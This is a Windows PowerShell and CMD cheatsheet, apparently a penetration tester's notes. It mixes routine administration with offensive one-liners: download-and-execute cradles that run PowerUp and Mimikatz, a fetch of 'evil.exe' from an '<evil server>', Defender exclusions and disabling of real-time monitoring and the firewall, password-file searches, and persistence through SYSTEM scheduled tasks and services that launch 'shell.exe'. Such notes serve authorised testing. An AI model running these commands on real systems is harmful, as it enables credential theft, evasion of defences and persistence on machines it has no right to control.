Windows Command Line Cheatsheet


Enable ISE using powershell

In the few months that I've been developing powershell, I've found the ISE to be incredibly useful. If you get on a new machine and the ISE isn't there, here's how you can get it going in the powershell terminal:

Import-Module ServerManager
Add-WindowsFeature Powershell-ISE

Securely store credentials in XML for Import

Start out by storing your username and password (in a SecureString format) in a PSCredential object:

$cred = Get-Credential

Next, go ahead and export your credentials to an xml file:

$cred | Export-CliXml <location>.clixml

Finally, when you need it, go ahead and import the credentials from the xml file and stored them in a variable ($cred2 in this particular scenario):

$cred2 = Import-CliXml <location>.clixml

Command output to file

Append this to whatever you're running to get the output in a text file:

| Out-File <location>

For example, if we want to run Invoke-AllChecks from PowerUp and output in a file called output.txt in C:\temp:

Invoke-AllChecks | Out-File C:\temp\output.txt

Command output to clipboard

Command | Clip

Require powershell script run as admin

Add this to the top of the powershell file: #Requires -RunAsAdministrator


Unzip file

Expand-Archive -Path -DestinationPath C:\temp\myfile


Download file

$url = ""
$outpath = "C:\temp\somebinary.exe"
Invoke-WebRequest -Uri $url -OutFile $outpath

Another way to download a file

Run from cmd:

powershell -exec bypass -c "(New-Object Net.WebClient).DownloadFile('','C:\temp\launcher.bat')"

Download PowerUp with Powershell <= v.2.0

This will get you the PowerUp powershell script and put it in C:\Temp, or some folder that the user you're on has permissions to write to.

You can also modify this snippet to download files if wget isn't available.

$WebClient = New-Object System.Net.WebClient

one-liner alternative:

(New-Object System.Net.WebClient).DownloadFile("","C:\Temp\PowerUp.ps1")

another one:

powershell.exe -ep bypass -e IEX ((new-object net.webclient).downloadstring(''))

Another to decode and execute a base64 powershell payload can be found here.

Using PowerUp

import-module c:\PowerUp\powerup.ps1
# Run all the checks

PowerUp one-liner

Get PowerUp, run it, and output to a text file so we can read the output easily.
powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks > C:\Temp\PU.txt

Powershell MimiKatz

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz

Tail a logfile

You can effectively tail -f the last two lines from a log file with the following:
Get-Content logfile.log -Tail 2 –Wait

Run Powershell Script to get around execution of scripts disabled error

powershell -ExecutionPolicy Bypass -File <file>.ps1

Download sysinternals

First you need to ignore ssl trust:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
then you can download it:
(New-Object System.Net.WebClient).DownloadFile("","C:\Temp\")

Useful powershell one-liners:

Get hostname:
List local accounts on a system:
Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'"
Check if system is joined to a domain or a workgroup:
if ((gwmi win32_computersystem).partofdomain -eq $true) { write-host -fore green 'This system is on a domain' } else { write-host -fore red 'This system is part of a workgroup' }

Set environment variable


Show env vars in running script

gci env:* | sort-object <name>

Check if system is running a desktop version of windows

$windesktop = (gwmi win32_operatingsystem).OperatingSystemSKU -notmatch "(\b[7-9]|10|1[2-5]|1[7-9]|2[0-5])"                           
if ($windesktop) 
    write-output "OS is a flavor of Windows Desktop" 

Get Windows kernel version


Get list of IPv4 addr

(gwmi Win32_NetworkAdapterConfiguration | ? { $_.IPAddress -ne $null }).ipaddress

Change hostname

Get-WmiObject -Class Win32_ComputerSystem

Log script output to file

Start-Transcript -path c:\windows\temp\interesting.log -Append -force

# do stuff

exit 1001

Open file with notepad

Start-Process notepad "C:\Program Files\Bla\bla.txt"


List Exclusions in Defender

Get-MpPreference | Select-Object -ExpandProperty ExclusionPat


Add exe to defender allowlist

Add-MpPreference -ExclusionProcess "C:\Temp\mimikatz\x64\mimikatz.exe"

Add extension to defender allowlist

This particular code will allowlist all files that end with a .txt extension:

Add-MpPreference -ExclusionExtension "txt"

Add folder to defender allowlist

Add-MpPreference -ExclusionPath "C:\Folder1"


Stop and Start Defender


Set-MpPreference -DisableRealtimeMonitoring $true


Set-MpPreference -DisableRealtimeMonitoring $false




wget http://<evil server>/evil.exe -Outfile evil.exe

Open command shell as a user

runas /profile /user:domain\username cmd

Open a powershell window as a user

runas /profile /user:domain\username powershell

Check Permissions for folder

icacls <path>

Netstat with findstr

This is an example of what I equate to running netstat and piping the results through grep in linux.
This is probably closer to netstat with grep:

netstat -ano | findstr 443

Netstat with find

Another way to run netstat and grep for something. In powershell you need to escape the double ticks or it will throw an error:

netstat -anob  | find `"443`"

Check if rdp is enabled

netstat /p tcp /a |findstr 3389


Look for files with passwords:

dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*

Disable firewall

netsh advfirewall set allprofiles state off

Search processes

Similar to using ps and piping the output to grep in linux:

tasklist | findstr processname

Make administrator user active

net user administrator /active:yes

Set user password to never expire

net user user /expires:never /active:yes /logonpasswordchg:no

Create Scheduled task

On start up as system:

schtasks /create /sc onstart /tn "NameofTask" /tr "C:\tools\shell.exe" /ru "SYSTEM"

To run every minute as system:

schtasks /create /sc minute /mo 1 /tn "NameofTask" /tr "C:\tools\shell.exe" /ru "SYSTEM"

List Scheduled tasks


Delete Scheduled task

schtasks /delete /tn "NameofTask" /f

Create service

On start up:

sc create ServiceName binpath="cmd.exe /k C:\Temp\shell.exe" start="auto" obj="LocalSystem"

List Services

sc query

Query Service

sc qc ServiceName


sc query ServiceName

Stop service

sc stop ServiceName

Start service

sc start ServiceName

Delete Service

sc delete ServiceName

Useful CMD one-liners:

Open event viewer from cmd:
Open services msc:
Lists all the service information for each process:
tasklist /svc
Kill a process by PID:
taskkill /pid <pid> /f
Kill firefox (or any process) by name:
taskkill /im firefox.exe /f
Delete a file:
del <file name>
List drives:
fsutil fsinfo drives
Show users with active sessions:
quser or query user
Show active network sessions:
netstat -vb
Get last modified file in a directory (conceptually similar to ls -lart):
dir /O:D /T:W /A:-D
Rename file:
move file new-file-name
Show contents of file:
type file.txt
Current current user and privilege info
whoami /all
List users
net users
List domain users and output to a file
net user /domain > domain-user-list.txt
List domain controller the current system is authenticated with
Get FSMO roles for current domain (useful info about domain controller setup)
List all domain controllers in the current domain
net group "Domain Controllers" /domain
Print password policy

net accounts

Reboot system immediately

shutdown /r /t 0

Query the registry

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Add a key to the registry

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Remove a key from the registry

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /v hFaZvOAsF /f

Show environment variables
How to rm -rf

rd /s /q "path"

Resources - creating scheduled tasks - creating services - how to rm -rf - adding a key to the registry